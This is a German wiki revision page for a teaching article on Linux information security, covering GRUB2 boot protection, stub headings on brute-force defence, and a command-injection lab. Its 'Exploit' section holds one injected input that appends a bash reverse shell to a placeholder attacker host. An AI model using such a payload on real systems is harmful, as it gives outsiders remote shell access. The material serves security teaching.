Informationssicherheit in Linux-Umgebungen: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 1: | Zeile 1: | ||
= physischer Zugangsschutz = | = physischer Zugangsschutz = | ||
| − | == Bootzugriff | + | == Bootzugriff absichern == |
* Der erste Prozess mit dem Linux gebootet wird, kann von GRUB2 bestimmt werden. | * Der erste Prozess mit dem Linux gebootet wird, kann von GRUB2 bestimmt werden. | ||
| Zeile 9: | Zeile 9: | ||
* Man sollte also kritische Systeme mit einem GRUB Passwort vor ungewollten Änderungen der Boot-Einträge absichern | * Man sollte also kritische Systeme mit einem GRUB Passwort vor ungewollten Änderungen der Boot-Einträge absichern | ||
* Anleitung zum setzen eines [[Grub2 Password|Passworts für GRUB2]] | * Anleitung zum setzen eines [[Grub2 Password|Passworts für GRUB2]] | ||
| + | |||
| + | = Brute Force Attacken = | ||
| + | |||
| + | == Hydra == | ||
| + | |||
| + | == SSH Daemon Konfiguration == | ||
| + | |||
| + | == Fail2Ban == | ||
= [[Command Injection]] über eine Webanwendung = | = [[Command Injection]] über eine Webanwendung = | ||
Version vom 17. August 2023, 08:11 Uhr
physischer Zugangsschutz
Bootzugriff absichern
- Der erste Prozess mit dem Linux gebootet wird, kann von GRUB2 bestimmt werden.
- So kann man das Passwort des root-Nutzers zurücksetzen, falls man diesen vergessen hat.
- D.h. aber auch, dass ein unautorisierter Benutzer mit Zugriff auf die physische Maschine sich eine Shell geben kann ohne Kenndaten einzugeben.
- Anleitung zu Linux boot hacking
- Man sollte also kritische Systeme mit einem GRUB Passwort vor ungewollten Änderungen der Boot-Einträge absichern
- Anleitung zum setzen eines Passworts für GRUB2
Brute Force Attacken
Hydra
SSH Daemon Konfiguration
Fail2Ban
Command Injection über eine Webanwendung
Laboraufbau
Schwachstelle im Code
Exploit
- 1.1.1.1 ; bash -c "bash -i >& /dev/tcp/i.p.des.hackers/port 0>&1"
